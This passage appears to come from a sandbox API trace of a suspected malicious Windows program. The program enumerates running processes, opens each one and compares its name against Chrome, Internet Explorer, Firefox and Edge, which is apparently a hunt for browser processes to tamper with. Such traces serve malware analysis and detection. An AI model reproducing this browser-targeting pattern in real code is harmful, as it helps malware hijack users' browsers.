	[0195.779] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0195.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xfd8
	[0195.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.780] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0195.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.780] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.781] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0195.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.781] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.781] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xfdc
	[0195.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.782] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.782] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.783] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.783] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.783] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0195.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xfe0
	[0195.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.784] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.784] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.785] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.785] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.785] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0195.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xfe4
	[0195.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.786] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0195.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.786] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.787] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0195.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.787] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.787] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xfe8
	[0195.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.788] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.789] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.789] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.789] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.789] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0195.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xfec
	[0195.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.790] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0195.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.791] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.791] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0195.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.791] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.791] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0195.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xff0
	[0195.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.792] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0195.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.793] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.793] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0195.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.793] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.793] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0195.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xff4
	[0195.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.794] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0195.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.794] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.795] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0195.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.795] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.795] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0195.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xff8
	[0195.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.796] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0195.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.796] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.797] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0195.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.797] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.797] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0195.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0195.798] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0195.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xffc
	[0195.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.799] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0195.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.799] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.800] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0195.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.800] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.801] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0195.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1004
	[0195.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.802] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0195.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.802] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.802] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0195.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.803] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0195.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1008
	[0195.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.804] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0195.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.804] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.804] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0195.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.805] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.805] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0195.805] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x100c
	[0195.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.806] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0195.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.806] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.806] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0195.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.807] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.807] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0195.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1010
	[0195.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.808] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0195.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.808] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.809] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0195.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.809] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.810] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0195.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1014
	[0195.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.810] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0195.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.811] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.811] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0195.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.811] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.811] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0195.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1018
	[0195.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.848] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0195.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.849] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.849] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0195.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.850] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.850] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0195.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x101c
	[0195.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.851] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0195.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.851] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.852] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0195.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.852] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.853] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0195.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1020
	[0195.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.853] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0195.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.854] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.854] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0195.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.854] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.854] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0195.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1024
	[0195.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.855] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0195.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.855] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.856] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0195.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.856] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.856] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0195.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1028
	[0195.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.857] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0195.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.857] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.858] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0195.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.858] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.859] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0195.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x102c
	[0195.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.859] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0195.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.860] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.861] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0195.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.861] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.862] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0195.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1030
	[0195.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.862] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0195.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.863] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.863] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0195.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.864] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.864] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0195.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1034
	[0195.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.865] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0195.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.866] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.866] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0195.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.867] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0195.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1038
	[0195.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.868] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0195.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.869] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.869] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0195.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.870] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.870] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0195.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x103c
